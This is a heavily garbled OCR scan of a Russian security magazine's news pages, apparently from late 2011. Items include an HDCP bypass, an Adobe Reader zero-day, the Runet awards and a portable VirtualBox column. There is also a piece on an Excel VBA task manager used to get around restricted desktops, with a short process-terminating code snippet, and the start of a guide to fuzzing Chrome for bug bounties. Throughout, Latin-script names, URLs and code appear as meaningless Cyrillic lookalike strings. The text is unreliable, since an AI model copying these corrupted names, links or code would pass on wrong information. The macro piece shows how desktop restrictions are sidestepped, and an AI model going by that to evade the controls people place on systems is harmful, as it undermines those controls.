телей, загрузивших Ыпих Міпі, стремительно выросло. Вероятнее всего, при- 
чиной этому стал новый пользовательский интерфейс Ііпііу, который недавно 
заменил в ІІЬипІи популярные среды Споте и КйЕ. Он ориентирован на новые 
форм-факторы, такие как планшетные компьютеры, а не на традиционные 
настольные ПК. 

Так или иначе, нов Споте пошли тем же путем при разработке Споте 3, 
в результате чего команда Ыпих Міпібыла вынуждена развивать Міпі Споте 
СЬеІІ Ехіепзіопздля Ыпих МіпИ2 и предложить более привычный рабочий стол 
с меню приложений, списком окон итреем для иконок используемых в данный 
моментприложений. 




ЕЮСР ВСЁ-ТАКИ 
ДОЛОМАЛИ 

КОМПАНИЯ ШТЕІ. ОКАЗАЛАСЬ НЕПРАВА — 
АППАРАТНОЕ РЕШЕНИЕ ДЛЯ «ВСКРЫТИЯ» НРСР 
СОЗДАНО 

рошлой осенью мы уже рассказывали, что си- 
стема защиты ЕШСР, разработанная компанией 
I піеі для шифрования видео- и аудиоданных, 
передаваемых по интерфейсу ЕШМІ, дала слабину. 

В сети тогда был опубликован мастер -ключ ЕШСР, 
однако компания Іпіеі отреагировала на это спокойно. 

В Іпіеі заявили, что за щита вовсе не потеряла своей 
эффективности, так как производство ЕШСР- чипов 
с подобным ключом — достаточно трудоемкая и затрат- 
ная задача. Проще говоря, Іпіеі намекнула, что та кое 
аппаратное решение всё равно никто не создаст. Чуть 
больше года спустя ученые из Рурского университета 
в Бохуме (Германия) доказали, что Іпіеі была неправа. :) 
ЕІемцы постаралисьупроститьзадачу и придумали, как 
использовать для обхода защиты достаточно недоро- 
гую плату Оідііепі АІІуз с программируемой вентильной 
матрицей (ЕРСА), поддерживающую ЕШМІ и Р5232 для 
перепрограммирования. Стоимость всех необходимых 
компонентов составила всего около $200. Подробные 
результаты своих изысканий ученые обнародовали 
на конференции по вопросам информационной безопас- 
ности РеСопЕід 2011. 






99НАСТОЛЬНЫХКОМПЬЮ- 
ТЕРОВ И 188 НОУТБУКОВ 

с различными данными 
были украдены у Министер- 
ства обороны Великобрита- 
нии или утеряны за послед- 
ние полтора года. 



СОГЛАСНО ДАННЫМ КОМПА- 
НИИ С0М5С0КЕ, пользова- 
тели в возрасте 12-17 лет 
за последний годстали 
пользоваться электронной 
почтой на 25% реже. 



ЯНДЕКС БУДЕТУВЕДОМ- 
ЛЯТЬ ВЛАДЕЛЬЦЕВ САЙТОВ 

озараженииихресурсов 
по е-таіі. Ранее эта возмож- 
ность была доступна только 
юзерам Яндекс. Вебмастер. 



В РЕЗУЛЬТАТЕ СБОЯ, произо- 
шедшего в ходе обновления 
портала госуслуг, 1 500 
деклараций дошли до ФНС 
в нечитаемом виде. Восста- 
новлениюони не подлежат. 



КОМПАНИЯ ІЫТЕІ.ВЫПУСТИ- 
ЛАБОЛЕЕ 120 ИСПРАВЛЕ- 
НИЙ, призванных улучшить 
поддержку архитектуры х86 
и процессоров Аіот в плат- 
форме Апсігоісі 4.0. 
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СПУСТЯ 16 ЛЕТ ПОСЛЕ ВЫХОДАСШАКЕ ВЛАСТИ ГЕРМАНИИ, наконец, разрешили продажу культовой игры. 



ПОСТРОЙ СВОЕГО РОБОТА! 



ИТОГИ «ПРЕМИИ РУНЕТА» 



ДОСТУПНЫЙ КОНСТРУКТОР ОТ КОМПАНИИ Е2-КОВОТ 





Роботы, способные 
распознавать речь, 
следитьза объек- 
том, интегрируемые 
віКоЬоІКоотЬа 
иктомужепро- 
даваемыепотакой 
смешной цене, 
настолько пригляну- 
лисьпокупателям, 
что все наборы разо- 
брали буквально 
за несколько дней, 
итеперьконструк- 
торанетв наличии 
на еі-гоЬоі.сот . 



ы регулярно рассказываем тебе о различных интересных наборах 
«сделай сам» и сегодня просто не смогли пройти мимо нового кон- 
структора Е2-РоЬоІ Сотріеіе Кіі от компании Е2-РоЬоС Этот срав- 
нительно недорогой набор, стоимость которого составляет$243, позволяет 
создаватьдостаточно много продвинутых роботов. В комплект входятбес- 
проводный контроллер, при помощи которого осуществляется управление ро- 
ботом, ультразвуковой датчик расстояния, три стандартных сервопривода, два 
серво постоянного вращения и беспроводная камера слежения. В комплекте 
также присутствуютаккумулятор, различная сервомелочевка и необходимое 
для работы будущих роботов ПО (судобным ОШ,такчтозапрограммировать 
робота сможет даже тот, кто никогда вообще ничего не программировал). Про- 
граммное обеспечение также позволяет распознавать речь, мимику и лица, 
жесты, цвета и даже некоторые символы. Через НТТР- веб-сервер можно 
контролироватьробота удаленно, посредством іРГіопе, АпбгоісІ или другого ПК. 
Пожалуй, создатели не включили в комплекттолько основу — корпус, в кото- 
рый помещается вся «начинка». С другой стороны, это лишняя возможность 
проявитьфантазию. 




РН0ЕМІХТЕСНГІ0І.06ІЕ5 ГОТОВИТСЯ КВЫХОДУ ѴШ00ѴѴ58 



В 5СТ 2.2 ДОБАВИЛИ 
БОЛЕЕ 60 НОВЫХ 
ФУНКЦИЙ, ПОВЫШАЮЩИХ 
ПРОИЗВОДИТЕЛЬНОСТЬ 
И БЕЗОПАСНОСТЬ, 
УЛУЧШАЮЩИХ СРЕДСТВА 
ПОДКЛЮЧЕНИЯ И Т.Д. 



СОСТОЯЛАСЬ VIII ТОРЖЕСТВЕННАЯ ЦЕРЕМОНИЯ 
ВРУЧЕНИЯ ПРЕМИИ РУНЕТА 



так, подведены итоги конкурса на присуждение 
Премии Рунета — 2011 ( ргетіагипеіа.ги ). 

VIII церемония поставила своеобразный рекорд: 
было вручено 35 статуэток. По традиции первыми были 
названы лауреаты в номинации «Государство и общество». 
Из рукИгоря Щёголева награду получили: 

• АНО «Модернизация» [проект і-Риззіа.ги ); 

• банкВТБ (проект«ВТБ — России» — д/ѵѵѵѵ.ѵіЬгиззіа.ги ); 

• Российское агентство правовой и судебной информа- 
ции — РАПСИ ( ѵѵѵѵѵѵ.іпіозисі.ги ). 

Специальная награда былатакже вручена компании «Ро- 
стелеком» за проект«Госуслуги». 

Победителями в специальной номинации «Безопасный 
Рунет», учреждённой Лигой безопасного интернета, стали: 

• компания Ооодіе (проект«Справочни к по детской 
безопасности в интернете»); 

Фонд Развития Интернет(проект«Дети онлайн»); 
Центранализа интернет-ресурсов ( ѵѵѵѵѵѵ.ІЧеіРоІісе.ги ). 

Награды в номинации «За вклад в развитие домена рф» 
удостоились: 

проект «Суперсадовни к. рф»; 
БольшоеПравительство.рф; 

портал для детей и подростков «Вектор-успеха. рф». 

В номинации «Культура и массовые коммуникации» по- 
бедителями стали: 

интернет-СМИ «Частный корреспондент» ( сЬазког.ги ); 
агентство гражданскойжурналистики «Ридус»; 

ЗАО «Сейчас» (интернет-проект ѵѵѵѵѵѵ.І\ІОѴѴ.ги ); 
Российская газета ( гд.ги ). 

Тройка лучшихв номинации «Стартапы года»: 
проект«Карамба-ТВ»( сагатЬа.Ы : 
проект«Бѵдист.рѵ»( ѵѵѵѵѵѵ.Ьис1І5І.ги ); 
проект«Налогия»( ѵѵѵѵѵѵ.па1одіа.ги ). 

Лауреатами в номинации«Наукаиобразование»стали: 
МаіІ.ги Сгоир (проект«Кубок Риззіап Собе Сир»); 
национальный образовательный проект «Умная-школа.рф»; 
проект«Живой словарь»отпортала «Грамота. ру» 
( дгатоіа.Ы ; 

социальная сетьчитателей книг ЦуеЫЬ.ги . 

В номинации «Здоровье и отдых» победили: 

система онлайн-бронирования ОІОІМ.ІгаѵеІ; 
международная сетьдоставки цветов АМЕги; 
портал оздоровье и медицине«ВитаПортал»( ѵііарогІаІ.ги ). 
Специальной «спортивной» номинацией компании «Ро- 
стелеком» отмечен проект«СпортБокс». 

В ходе церемонии была официально завершена всероссий- 
ская онлайн-акция «Народное голосование Премии Рунета 
— 20 11». Звание «Народного лидера» в итоге разделили 
сразу два проекта: «Легенда: Наследие Драконов» и ѴѴогІб 
оЛапкз. Всех десятерых победителей, которым досталось 
этозвание, можно найти на сайте пагоб.ргетіагипеіа.ги . 
Лауреатами в номинации «Экономика и Бизнес» признаны: 

• компания«1С-Битрикс»(проект«Корпоративный портал»); 

• биржа удаленной работы Ргее-Іапсе.ги; 

• деловой портал ВРМ.ги . 

Статуэтки в номинации «Технологии и инновации» получили: 

• интернет-супермаркет программного обеспечен ия 
«Софткей» ( БоЙКеу.ги ); 

• компания «Вымпелком» (Билайн); 

• проект «Хабрахабр» ( ЬаЬгаЬаЬг.ги ); 

• социальная сеть«Одноклассники»; 

• компания «Ростелеком». 
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МЕ6АЫЕѴѴ5 



ХАКЕРЫ ПОХИТИЛИ ДАННЫЕ 0 13,2 МИЛЛИОНАХ пользователей игры МарІеБіогу. Инцидент произошел в Южной Корее. 



ЕЩЕ ОДНАУЯЗВИМОСТЬ СЮАУ 

НАЙДЕНА в продуктахарове 



СКАЖЕМ «НЕТ!» бООбИЕ 
И ВІ N0 



ХАКЕРЫ УЖЕ ИСПОЛЬЗУЮТ ЕЕ В СВОИХ ЦЕЛЯХ 





АсІоЬе 



АсІоЬе обозначила 

уязвимостькак 

«ЦЗОтетогу 

соггирііоп 

ѵиІпегаЬіІіІу». 

ІІЗй представляет 

собойтехнологию 

ІІпіѵегзаІЗОифай- 

ловыйформатдля 

хранениятрехмер- 

ныхграфических 

данных. Уязвимость 

заключается втом, 

чтовРОР-документ 

можно внедрить 

вредоносный 1130- 

контент, исполнение 

котороговсистеме 

вызываетперепол- 

нениебуфера. 



хужэти многострадальные АсІоЬе Реабег и АсгоЬаі! Порой скла- 
дывается ощущение, чтоони состоят издыр и баговчутьболее 
чем полностью. Компания АбоЬеБузІетз подтвердила наличие 
незакрытой критической уязвимости в упомянутом выше ПО. Дыра обна- 
ружена в АсІоЬе РеабегХ (версии 10.1.1 и ниже) для ѴѴіпбоѵѵз и МасіпІозЬ, 
АбоЬе Реабег 9.4.6 для ІІпіх, а также в АбоЬе АсгоЬаШдо версии 10.1.1 
включительно) для ѴѴіпбоѵѵз и МасіпІозЬ. Из-за этойуязвимости могут 
падать программы, кроме того, она потенциально позволяет хакеру полу- 
чить контроль над системой. Известно также, что киберпреступники уже 
взяли на вооружение новую Обау. Позаявлениям АбоЬе, дырка исполь- 
зуется входеограниченныхцелевыхатак. В качестве целей, вероятно, 
выбраны военные подрядчики США: изначально АбоЬе заявила, что об 
уязвимости сообщили группы реагирования в ЬоскЬееб МагЬп и МИРЕ. 
Чутьпозже компания изменила«показания», и стала утверждать, что 
информация об уязвимости поступила неотМІТРЕ, а отОеіюпзеБесипІу 
ІпІюгтаЬоп ЕхсЬапде — группы военныхподрядчиков, которыеобмени- 
ваются разведывательными данными по киберугрозам. Патчи для Реабег 
и АсгоЬаі9уже вышли, а вот исправлений для Реабег и АсгоЬаИО (а также 
для версий под Мае 05 Хи ІІпіх) можно ждать только в конце января. 




О Р2Р-ПОИСКОВИКЕ ѴАСѴ 

осле пяти лет работы в поте лица активисты движения 
за свободное ПО представили миру свой новый проект: 
распределенную поисковую систему УаСу ( ѵасѵ.пеі ), которая 
в перспективе должна составить конкуренцию Ооодіе, ѴаЬоо, Віпд 
и прочим коммерческим поисковикам. Основная фишка нового 
сервиса втом, что он работает по принципу Р2Р, то есть за хранение 
поискового индекса и обработку поисковыхзапросов УаСу отвечает 
не центральный сервер, а сеть независимыхучастников, на компью- 
терах которых работает одноименная программа. Никто из участ- 
ников сети не можетповлиять на результаты, которые выдаются 
по запросу пользователя, или на порядок их отображения на стра- 
нице. В сеть Ргееѵѵогіб может войти любой желающий, установив- 
ший ПО подСЫІІ/ипих, ѴѴіп6оѵѵ5или МасОБ. Посути,ѴаСу — это 
своего рода аналог свободной социальной сети Оіазрога, которая 
позиционируется как альтернатива закрытым централизованным 
сетям РасеЬоок, ЗоодІе+ и т. п. Р2Р-сеть и открытый код гарантируют 
устойчивостьпоисковика изащищаютего отцензуры. На каждом 
узле создается собственная база поисковых индексов, а протокол 
предусматривает возможность обмена базами с другими узлами. Ав- 
торы УаСу считают, что важнейшую задачу поиска в интернете нель- 
зя доверять нескольким крупным компаниям, та к как это угрожает 
конфиденциальности пользователей. Поддержку УаСу осуществля- 
еторганизация Ргее БоЙѵѵаге РоипбаЬоп Еигоре (РБРЕ). 






НАЧАТЫ ПОСТАВКИ НОВОЙ ЭЛЕКТРОННОЙ КНИГИ ѴѴЕХІ.ЕК. 
ВООКТ7005 С 7-ДЮЙМОВЫМ сенсорным экраном и ЬЕй- 
подсветкой для комфортного чтения. Устройство оснаще- 
но встроенной памятью 8 ГБ (можно расширить до 32 ГБ 
с помощью карт МісгоБР) и мощным аккумулятором 2800 
мА ч. Новинка поддерживает самые популярные форматы 
электронных книг, видео, аудио и изображений. Отдел ьносто- 
итотметитьподдержкуформата БОС. Важным достоинством 
также является наличие ТВ-выхода, благодаря которому 
можно подключить ѴѴЕХІ.ЕВ.ВООКТ7005 прямо к ТВ. Книга 
позволяет передавать на внешние устройства звук и изо- 
бражение качеством до 720р. Для удобства пользователей 
новинка оснащена датчиком пространственного положения 
-6-сенсором. Ориентировочная розничная ценаустройства 
— 3990 рублей. 




6006І.Е СООБЩАЕТ, ЧТО 
КОЛИЧЕСТВО СКАЧИВАНИЙ 

на Апбгоіб Магкеідостигло 
десяти миллиардов. Каждый 
месяце Магкеі совершается 
порядка одного миллиарда 
покупок. 




ИОКІАИ ИНТЕРНЕТ-ХОЛДИНГ 
МАП.ІШ бКОЦР ВЫПУСТИЛИ 
СОБСТВЕННЫЙ БРАУЗЕР. 

Новинкой планируется осна- 
стить 27 моделейтелефонов 
Мокіа на платформе5егіез40. 
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26% СПЕЦИАЛИСТОВ ПО БЕЗОПАСНОСТИ просматривают конфиденциальные данные, к которым у них вообще не должно быть доступа. 



ѴѴЕВ05 СТАНОВИТСЯ ОТКРЫТЫМ ПРОЕКТОМ 



КОМПАНИЯ НР ПРИНЯЛА РЕШЕНИЕ ОТНОСИТЕЛЬНО БУДУЩЕГО МОБИЛЬНОЙ ПЛАТФОРМЫ 



апомним, что компания НР не та к давно отказалась от даль- 
нейшего развития всего своего мобильного подразделения. 
Однако окончательный вердикт о судьбе операционной 
системы ѵѵеЬОЗтогда озвучен небыл, что, конечноже, породило 
множество слухов итеорий. В частности, предполагалось, чтоѵѵеЬОЗ 
будет куплена компанией Атагоп или Огасіе. Также напомним, что 
впервыеэта мобильная платформа была представлена компанией 
Раіт в качестве замены устаревшей Раіт 05. В свою очередь, в пер- 
вой половине 201 0 года компания Раіт была приобретена НРза 1,2 
млрддолларов. 

Но вернемся кѵѵеЬОЗ. В середине декабря НеѵѵІеН-Раскагб 
наконец-то объявила о своем решении. Компания откроет исходный 
код ѵѵеЬОЗ и объединитусилия с сообществом разработчиков опенсор- 
са, которые небудутплатитьза это никакихотчислений НР. Возможно, 
благодаря этому решен ию проект получит новое воплощения и зажи- 
вет, наконец, нормальной жизнью. В общем-то, по аналогичной схеме 
сейчас распространяется система АпсІгоісІ. Примечательно, правда, 
что тип лицензии, на условиях которой будут распространяться от- 
крытые исходники ѵѵеЬОЗ, — СРІ_, В50 или излюбленный МісгозоН 
механизм ЗИагеб Зоигсе — в соответствующем пресс-релизе не огова- 
ривается вовсе. Какзаявила в интервьюдляТесЬСгипсЬ генеральный 
директор НРМегУитмен, компаниятакже не исключает, что в даль- 
нейшем займется производством новых планшетов под управлением 
ѵѵеЬОЗ. По ее мнению, это может произойти в 2013 году, так как в 2012-м 
НРделаетупор на устройства под управлением ѴѴіпсІоѵѵз 8. 

В тоже время, в середине декабря, НеѵѵІеН-Раскагб устроила 
запланированную распродажу оставшихся планшетов ТоисЬ Раб. 
Аттракцион невиданной щедрости проводился на аукционе еВау, 
в секции для отремонтированных товаров и товаров со скидкой. Ком- 
пания действительно предлагала устройства, прошедшие процедуру 
восстановления, то есть не новые изделия, а, например, когда-то 
возвращенныепотребителями (зачастую в нераспакованном виде) 








Вближайшем 
будущем НР обещает 
представить широкой 
общественности 
обновленную платформу 
ЕИУО для разработки 
приложений подѵѵеЬОБ. 




или из демонстрационныхзалов магазинов. В одни руки отпускалось 
только подваустройства. Девайсы расходилисьсошеломляющей 
скоростью. Планшеты НРТоисЬРаб с 16 Гбайт встроенной памяти, 
предлагаемые по цене $99, закончил исьуже через 15 минут. ТоисЬРаб 
с 32 Гб встроенной памяти стоимостью $149 продавались немного 
дольше, но, по свидетельству ритейлера, распродажа планшетов 
за вершилась через 25 ми нут после старта. Всего было реализовано 
7850 Тоисб Раб. Единственное, что неизвестно, — как продавались ак- 
сессуары в комплекте (чехол, зарядная док-станция и беспроводная 
клавиатура), цена которого составляла $79. Ажиотажвокруграспро- 
дажи был так велик, что в работе еВау произошел сбой, а в платежном 
сервисе РауРаІ наблюдались задержки с прохождением транзакций. 
Инсайдеры утверждают, что изначально остаток ТоисЬ Раб планиро- 
вали реализовать среди сотрудников НР, но затем компания по неиз- 
вестным причинам изменила свои планы. 



ЗАКОНЧИЛСЯ КОНТЕСТ ПО ПОИСКУ УЯЗВИМОСТЕЙ ВЯНДЕКСЕ 



ОРГАНИЗАТОРЫ ХОТЕЛИ ОГРА- 
НИЧИТЬСЯ ОДНИМ ПРИЗОВЫМ 
МЕСТОМ С НАГРАДОЙ $5000, НО, 
ТАК КАК ДЫР БЫЛО ОБНАРУЖЕ- 
НО МНОГО, ПРИШЛОСЬ ВВЕСТИ 
ВТОРОЕ И ТРЕТЬЕ МЕСТО 
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КОЛОНКА СТЁПЫ ИЛЬИНА 

ВИРТУАЛЬНАЯ МАШИНА 
НАФЛЕШКЕ 



есмотря на то, что я все больше использую разные онлайн- 
^ сервисы для решения многих задач, на флешке у меня всегда 
есть набор незаменимых рогІаЫе-приложений, которые за- 
пускаются без установки на любом компьютере. Разработчики сами часто 
выкладывают портабельные версии своих продуктов. Но если даже нет, 
то за них это зачастую делают энтузиасты ( рогіаЫеаррз.сот/ги ). В конце 
концов, сейчас уже каждый может скачать замечательную утилиту 
Сатеуо ( ѵѵѵѵѵѵ.сатеѵо.сот ) и сделать рогІаЫе-версию практически 
любого приложения. Цель достигается за счет так называемой виртуа- 
лизации: приложение помещается в специальный контейнер, в котором 
эмулируется нужные для его работы ветки реестра, файлы на диске и 
т. д. Где бы оно ни запускалось, для него всегда будут созданы такие 
тепличные условия :). Увы, виртуализировать таким образом можно 
далеко не всё. Когда мне кровь из носа понадобилась портабельная 
виртуальна машина, на которой можно было бы запускать гостевые 
ОС, оказалось, что ѴНиаІВох под Сатеуо не работает. На официальном 
сайте подходящей версии виртуальной машины не было, однако на 
форуме я нашел ссылочку на интересный проект — РогІаЫе-ѴНиаІВох 
( ѵѵѵѵѵѵ.ѵЬох.те ). 

Цель разработки — заставить ѴИиаІВох работать без установки 
и запускаться откуда угодно, например с ІІ5В-носителя. Интересно, 
что утилита полностью написана на скриптах Аиіоіі (все исходники 
открыто лежат в ЫЫу/гй0п72 ). но из-за этого, правда, и выглядит не 
очень изящно. Но главное-то — результат. Итак, скачиваем приложе- 
ние (у меня это РогІаЫе-ѴИиаІВох_ѵ4.1.6-5іагІег_ѵ6.4.8-ѴѴіп_аІІ.ехе) и 
запускаем его — программа предложит выбрать путь для распаковки. 
После этого можно запустить РогІаЫе-ѴИиаІВох.ехе. Все настройки 
выставляются автоматически, исправлять что-то вручную (например, 
пути) не требуется. Появившееся окно — это так называемый лончер. 
Он появляется один раз и предназначен для загрузки последнего дис- 



трибутива ѴИиаІВох и извлечения оттуда нужных файлов. Интересно, 
что на этом этапе файлы можно еще и особым образом упаковать, что- 
бы они занимали меньше места на ІІ5В-флешке (хотя при нынешних 
размерах флешек это едва ли актуально). Жмем на кнопку «йоѵѵпіоасі 
іпзіаііаііоп біез о{ ѴИиаІВох», выбираем разрядность системы (напри- 
мер, «Ехігасі 1Ье Шез Іюг 32-ВИ: зузіет») и ждем, пока лончер сделает 
все свое дело. Чтобы установщик адаптировал пути под систему 
(поправил нужные параметры в конфиге ѴИиаІВох.хтІ), бинарник 
РогІаЫе-ѴИиаІВох.ехе нужно запустить еще раз. Вуаля — у нас в рас- 
поряжении есть полноценная ѴИиаІВох. Без какой-либо установки в 
систему. 

В трее появится иконка ѴИиаІВох, с помощью которой можно 
управлять виртуальной машиной и дополнительно настраивать ее. В 
гостевых ОС по умолчанию работает и 115В, и сеть. Но чтобы выпустить 
гостевую ОС во внешнюю сеть (инет), придется провести некоторые 
дополнительные манипуляции. В трее надо выбрать «ЗеШпдз -> 
ІЧеІѵѵогк» и включить опцию «5іагІ ѴИиаІВох ѵѵШз пеіѵѵогк зиррогі». 
Далее нужно перезапустить РогІаЫе-ѴИиаІВох и согласиться на уста- 
новку драйвера. Процесс организован так, что при завершении работы 
с виртуальной машиной всё, что было установлено в систему, удаляет- 
ся. Файлы гостевой ОС разумно разместить прямо на флешке вместе с 
ѴИиаІВох. У меня эта система одна, поэтому ее можно запускать сразу, 
без дополнительных манипуляций, указав в параметрах ее имя: 

РогЕаЫе-ѴігЕиаІВох.ехе "ІеорапсІ" 

Учитывая, что виртуальная машина всегда находится не в выклю- 
ченном состоянии, а в режиме «5аѵе 1Ье зіаіе», ее запуск происходит 
очень быстро. Поэтому она всегда готова к работе без лишнего гемор- 
роя. И где угодно. ПЕ 
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Настройка рогІаЫе-версии виртуальной машины 



ѴИиаІВох работает без установки 
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" РгооРоРСопсерІ: 

1 МЕНЕДЖЕР ЗАДАЧ НА ЕХСЕІ. 



На кой черт может понадобиться таск-менеджер, реализованный стандартными средствами ЕхсеІ? 
Хороший вопрос. Известному специалисту по информационной безопасности Дидье Стивенсу 
пришлось сделать подобную штуку, когда он столкнулся с системой, в которой было запрещено 
буквально всё. Взаимодействие с ОС осуществлялось через специальную оболочку, препятствующую 
запуску большинства приложений, в том числе и стандартного таск-менеджера (через который 
ее легко можно было бы отрубить), да и локальные политики ограничивали его использование. 
Увидев, что ЕхсеІ входит в число разрешенных для запуска приложений, Дидье подумал, почему бы 
не задействовать встроенные в ОІТісе ѴВА-макросы, чтобы управлять запущенными процессами в 
системе? Подумал-подумал и сделал полноценный таск-менеджер. 



КАК ЭТО ВЫГЛЯДИТ? 

РоС представляет собой обычный ЕхсеІ- 
файл — ТазкМападег.хІз. Идея проста: если в 
системе ограничен запуск таск-менеджера, 
но при этом есть возможность открывать 
ЕхсеІ-таблицы с макросами, то управлять 
процессами можно через несложный макрос, 
реализованный на ѴВА (ѴізиаІ Вазіс для 
приложений). Открыв файл, ты увидишь две 
кнопки: І_ізІ ргосеззез (Отобразить процессы) и 
Ехесиіе соттапсіз (Выполнить команду). Соб- 
ственно, жмем первую и видим, как таблица 
быстро заполняется информацией о процессах 
(название исполняемого файла, Ю процесса, 
путь к бинарнику, пользователя, под которым 
запущен процесс, время создания процесса, а 
также разрядность — 32 или 64 бита). Любой 
из процессов можно выгрузить, приостановить 
и, соответственно, возобновить. Для этого в 




ТазкМападег.хІз в действии 



колонке СоттапсІ напротив процесса надо 
поставить флаг нужной команды (например, 
терминейту процесса соответствует буква I) и 
нажать на кнопку Ехесиіе соттапсіз. Получа- 
ется реально полезная штука. Тут даже не надо 
фантазировать по поводу пентеста и ограни- 
ченных окружений, чтобы представить, зачем 
она может понадобиться. Вспомни хотя бы 
ѵѵіпіоскег'ы — любая подобная дрянь блокиру- 
ет запуск таск-менеджера. 

КАК ЭТО РАБОТАЕТ? 

Все макросы полностью написаны на чистом 
ѴВА. Для манипуляции с процессами вызы- 
ваются Ѵ\/І Ы32-функци и из соответствующих 
системных библиотек. Нужные функции 
вначале объявляются путем подгружения из 
0І_І_, которое осуществляется примерно таким 
образом: 




Простейший код на ѴВА позволяет с легкостью управлять 
процессами в системе 



Ргіѵаііе Ресіаге Рипсіііоп ОрепРгосезБ І_іЬ 
"кегпе132.сИ1" (ВуѴаІ сІыОезігесІАссеззаБ 
Аз і_оп %. ВуѴаІ ЫпбегіІіНапсІІ е Аб 
В ооіеап., ВуѴаІ сіыРгосісі Аз і- опе 1 ) Аб і_оп§ 

После этого их можно использовать без 
ограничений. К примеру, следующая функция 
выгружает процесс из памяти: 

Ргіѵаііе 5иЬ Т егтіпа1:еРгосе55ВуІР( 

ВуѴаІ ІРгосезБІ Р Аб і_оп§) 



ІіРгосѳбб = 0репРпосе55( 

РКОСЕ55_ТЕКМІІ\ІАТЕ, 0, ІРгосеББІР) 



ГМзРгосеББ о Ѳ Тбеп 

ТегшіпаІіеРгосеББ ІіРгосѳбб. 0 
СІозеНапсІІе ІіРгосѳбб 



Последняя версия ТазкМападег.хІБ работает 
как в 32-, так в 62-битных системах, отлично 
себя чувствует в любых Офисах (вплоть до 
64-битной версии ОЛчсе 2010) и имеет цифро- 
вую подпись. 

Бери на вооружение л инк для загрузки: 
Ыод.бібіег5іеѵеп5.сот/2011/11/30/5ІдпесІ- 

{азктападег . Остается только сказать Дидье 
спасибо за классный РоС, который многим на- 
верняка пригодится для решения конкретных 
задач. ИИ 
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Артур Геркис (іѵѵіНег.сот/ахЗЗОсІ, опзес.ги] 




Охота 



на жуков 

в боодіе 
СЬготе 



Ѵ!ШП 



ЬИ.Іѵ/грВДН9 — 

список инициатив, 
где можно получить 
кеш за уязвимости; 

сапіизе.сот 

— таблица 

возможностей 

браузеров; 

ЬіЫѵАаРА75 — 

историческая 
новость отЫеІэсаре; 

ЫЩаІУуоі — НаМ 

Рате; 

ЫЫу/куВЕку — 

проект АБап; 
ЫШоішѢР — 

исследовательская 
работа «НоѵѵОреп 
БИоиІсі Ореп Боигсе 
Ве?»; 

ЫЦу/иОуууЕИ — 

интересная работа 
«Огаттаг-ВазесІ 
ІпІегргеІегРии 
Тезііпд». 






На нашем дискеты 
найдешьскрипт 
сборки СИготе, 
а также все 
перечисленные 
в статье публичные 
фаззеры. 



РУКОВОДСТВО 
ПО ЗАРАБОТКУ 
НА ПЕНТЕСТЕ 
ПОПУЛЯРНОГО 
ВЕБ-БРАУЗЕРА 

Сегодня существует немало различных 
программ Ьид Ьоипіу, с помощью которых 
можно неплохо заработать на поиске 
уязвимостей в софте с открытыми 
исходниками. В браузерном мире сама 
Ыеівсаре инициировала это движение 
уже в далеком 1995 году, а затем МоііІІа 
и боодіе подхватили тенденцию. Прямо 
сейчас я научу тебя, как выжать баксы 
из боодіе СЬготе. 
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Охота на жуков в Ооодіе СЬготе 
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Фаззим браузер собственной сборки 



ОБ ИНИЦИАТИВЕ 60061-Е 



Прежде чем хвататься за поиск багов и написа- 
ние отчетов, с моей стороны было бы корректно 
рассказать читателю, с чем мы имеем дело. 

А дело мы имеем с Ооодіе ѴиІпегаЬіІіІу Реѵѵагб 
Ргодгат. В рамках этой программы корпорация 
добра предлагает денежное вознагражде- 
ние всем, кто желает помочь проекту Ооодіе 
СЬготе в повышении уровня безопасности. При 
этом можно не только получить деньги, но и за- 
светиться в списке НаІІ о{ Рате, куда включают 
всех исследователей, которые так или иначе 
помогли в исправлении багов. Чтобы попасть 
в него, вовсе не обязательно претендовать 
на кеш, достаточно быть искренне заинтересо- 
ванным в оказании помощи, активно участво- 
вать в проекте и положительно себя проявить. 

Эта программа, запущенная в январе 2010 
года, изначально предусматривала три уровня 
вознаграждения: $500, $1000 и $1337. Через 
полгода в программу, отметившую мини- 
юбилей, были внесены изменения, в том числе 
и введен четвертый уровень вознаграждения 
— теперь за обнаружение критического бага 
дают $3133,7, а за отчет хорошего качества — 
$1000 (что это за отчет, ты узнаешь, прочитав 
статью до конца). 

Лидером команды безопасников СЬготе 
является небезызвестный исследователь 
СЬгіз Еѵапз. Вместе с Абат Меіп он и раздает 
кеш налево и направо. Первым человеком, 
которому выплатили сумму, соответствующую 
новому «элитному» уровню, стал Сергей Глазу- 
нов, нашедший уязвимость «Вгоѵѵзег сгазЬ іп 
НТМІ.5 зреесЬ III» ( сгЬиа.сот/68666 ). Правда, 



не всегда стоит рассчитывать на получение 
заявленной суммы. Вознаграждение может 
оказаться и больше :). Например, недавно 
человеку под ником ѵѵизЫ из команды 1еат509 
выплатили не 500, а 509 долларов за найден- 
ную уязвимость просто ради шутки, из-за сим- 
воличного названия. Так что ребята в Соодіе 
тоже не без юмора. 

В зависимости оттипа приложения и его 
лицензии применяются разные методы по- 
иска уязвимостей. Но браузер с открытыми 
исходниками предоставляет нам возможность 
пользоваться абсолютно всеми доступными 
методами, что увеличивает шансы обнаружить 
баг. В данном случае я считаю целесообразным 
прибегнуть как минимум к следующим методам 
поиска уязвимостей: фаззинг, изучение исход- 
ников, бинарный анализ, «переоткрытие» ба- 
гов, ручной поиск с тестированием. Последние 



СТАТИСТИКА НАН ОР РАМЕ 



На сегодняшний день на странице 
боодіе 5есигі*у НаІІ о* Рате висит длинный 
и регулярно пополняющийся список хакеров. 
Но обычно там можно встретить одних и тех 
же известных багхантеров, всего около 60 
человек (включая исследовательские группы 
и компании). За всё время существования 
инициативы было выплачено порядка 270 
тысяч долларов! 



два метода могут смутить своими названиями, 
однако далее мы подробно поговорим о них. 



ФАЗЗИНГ 



Думаю, понятие фаззинга всем известно, 
поэтому не буду повторяться, а лишь опишу 
некоторые моменты, касающиеся браузеров. 
Здесь, прежде всего, следует помнить о том, 
что не ты один ищешь уязвимости — я смело 
предположу, что это делаюттысячи людей 
по всему миру с помощью компьютеров и так 
называемых фаззинговых ферм. Так что это 
самая настоящая гонка! И чтобы не отставать 
от других, твоя программа-фаззер должна об- 
ладать следующими свойствами: 

• оригинальностью; 

• высокой скоростью работы (количество 
уникальных тестов в единицу времени); 

• способностью воспроизведения крашей 
(логирование). 

Под оригинальностью я в первую очередь 
подразумеваю какие-либо особенности, отли- 
чающие твой фаззер от тех, которые находятся 
в публичном доступе. Таким образом, лучше 
написать свой собственный фаззер, хотя, 
конечно, можно взять и любой доступный, 
но его необходимо модифицировать так, чтобы 
он мог генерировать уникальные тест-кейсы. 
Как ты понимаешь, нет никакого смысла в том, 
чтобы всем дружно фаззить одни и те же баги. 
